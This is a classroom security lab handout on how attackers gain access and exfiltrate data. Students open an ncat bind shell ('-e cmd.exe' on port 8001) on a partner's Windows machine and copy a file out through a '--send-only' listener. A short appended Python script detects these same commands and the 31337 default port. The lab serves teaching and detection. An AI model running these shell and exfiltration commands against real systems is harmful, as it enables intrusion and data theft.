Shell lab SP17 DBGrevised (1)

  1. Getting a command (CMD) shell

Objective: Understand how APT allows access into a corporate network.

Discussion: It is important to understand how attackers obtain a shell on a remote system, since it is a common method of maintaining access and stealing data (exfiltration, or "exfil"). netcat is a simple but powerful program for establishing connections. netcat derives its name from the Linux command for typing out the contents of files: cat (short for concatenate, meaning join).

Scenario: Two systems can directly communicate with each other on an arbitrary port (i.e. there is no firewall or other device preventing them from communicating directly with each other). Alice is the victim and Eve is the attacker, so one of you will be Alice for the duration of the assignment and the other Eve. When the first person is done, switch roles.

Preparation:

  1. Ensure the two Windows workstations can ping each other.

  2. Make a note of each other’s IP address.

    1. 192.168.3.27

  3. Download and install nmap from nmap.org

  4. Start a command prompt (cmd.exe)

  5. Change directory to the nmap install dir (cd "C:\Program Files (x86)\Nmap")

  6. On each system (i.e. both Alice and Eve), type hostname into the command prompt so you know the hostname of each.

On Alice's computer, a listener (-l, lower case L) is started on port 8001, and anyone who connects to it will get a command prompt on Alice's computer. The -v is for verbose mode. It is always a good option so you know what is going on as the shell is being set up.

Alice (on Windows): ncat -l 8001 -e cmd.exe -v

Eve connects to Alice's computer on port 8001:

ncat X.X.X.X 8001

Replace X.X.X.X with the IP address of Alice's computer.

Eve should now see something like this:

Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Alice

Eve is now logged into Alice's system and can type commands as if she were sitting in front of Alice's computer.

Run the command: hostname

You should see the computer name of the Windows system. Additionally, run the command:

ipconfig /all

This should display the IP address of your partner's Windows system.

Submission: Take a screenshot of the results above for both commands and switch roles.

  2. Optional DATA EXFILTRATION

Objective: Understand how an Advanced Persistent Threat (APT) exfiltrates (retrieves) data from an organization.

Scenario: Assume two systems can directly communicate with each other on an arbitrary port (i.e. there is no firewall or other device preventing them from communicating directly with each other). Alice is the victim and Eve is the attacker.

Attackers often browse around the compromised system, then compress and transfer files to a remote system. This lab demonstrates that capability using ncat.

Preparation: Re-establish a shell on your partner’s system (from the previous lab).

Alice: Download the "expense-report.xls" file from Canvas and save it to the Downloads folder, which should happen by default.

Eve should have an ncat session open on Alice's host (from the previous lab). Using her access to Alice's cmd, Eve is going to open another listener on Alice's computer on port 4000.

Eve (run this command on Alice’s computer):

ncat -vv -l 4000 --send-only < %USERPROFILE%\Downloads\expense-report.xls

The < is a redirect indicating that whoever connects will be sent the file.

%USERPROFILE% is substituted with the user's home directory path.

Eve: Open a new command prompt on your workstation and run the following:

Browse to your Downloads directory.

Type dir to see the contents.

In the "dir" command above, look for the expense-report.xls file before running the command below. It should not be there.

Eve: ncat -vv host1 4000 > expense-report.xls

Replace "host1" with the IP address of Alice's workstation. This connects to the new listener on port 4000 and redirects the received file onto Eve's computer.

Eve: Browse to your Downloads folder and check that the "expense-report.xls" file is now there AND that you can open it.

Using the backdoor connection to Alice, Eve was able to open up a connection she could use to transfer files out of Alice’s computer.

Submission: Take a screenshot of the output from the ncat commands to upload to Canvas.

INFORMATIONAL ONLY: Always specify a port number. Otherwise, ncat will default to using port 31337. That is a well-known Trojan port, and an Intrusion Detection System or firewall may alert on it. The type of attackers that 'persist' in networks would want to hide their existence.
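From the defender's side, the commands used in both parts of this lab (the ncat bind shell, the --send-only file listener, and the default port 31337 noted above) are what process command-line logging can flag. The following is an added example, not part of the lab handout, that runs a simple classifier over constructed command lines modelled on this lab; the flag sets and messages are the author's assumptions, not any real IDS rule set.

```python
# Added example (not from the lab): flag ncat listeners in process command lines.
NCAT_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe"}
NCAT_DEFAULT_PORT = 31337          # what ncat listens on when no port is given
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}   # flags that hand a connection a program

# Constructed sample command lines, modelled on the commands run in this lab.
SAMPLE_CMDLINES = [
    "ncat -l 8001 -e cmd.exe -v",
    "ncat -vv -l 4000 --send-only < C:\\Users\\Alice\\Downloads\\expense-report.xls",
    "ncat -l -e cmd.exe",            # port omitted, so ncat falls back to 31337
    "ncat 192.168.3.27 8001",        # outbound client side, not a listener
    "ping 192.168.3.27",
]


def analyze_cmdline(cmdline):
    """Return {'port': int, 'reasons': [...]} for an ncat listener, else None."""
    tokens = cmdline.split()
    if not tokens or tokens[0].lower() not in NCAT_NAMES:
        return None
    if "-l" not in tokens and "--listen" not in tokens:
        return None                  # client connection, not a listener
    # First bare number after the program name is the port; none means the default.
    port = next((int(t) for t in tokens[1:] if t.isdigit()), NCAT_DEFAULT_PORT)
    reasons = []
    if EXEC_FLAGS & set(tokens):
        reasons.append("listener executes a program: bind shell")
    if "<" in tokens and "--send-only" in tokens:
        reasons.append("listener serves a redirected file: possible exfiltration")
    if port == NCAT_DEFAULT_PORT:
        reasons.append("default port 31337 (well-known Trojan port)")
    return {"port": port, "reasons": reasons}


def scan(cmdlines):
    """Map each suspicious command line to its findings (listeners with no findings are dropped)."""
    return {c: r for c in cmdlines if (r := analyze_cmdline(c)) and r["reasons"]}


if __name__ == "__main__":
    for cmd, finding in scan(SAMPLE_CMDLINES).items():
        print(f"{cmd!r}\n  port {finding['port']}: {'; '.join(finding['reasons'])}")
```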
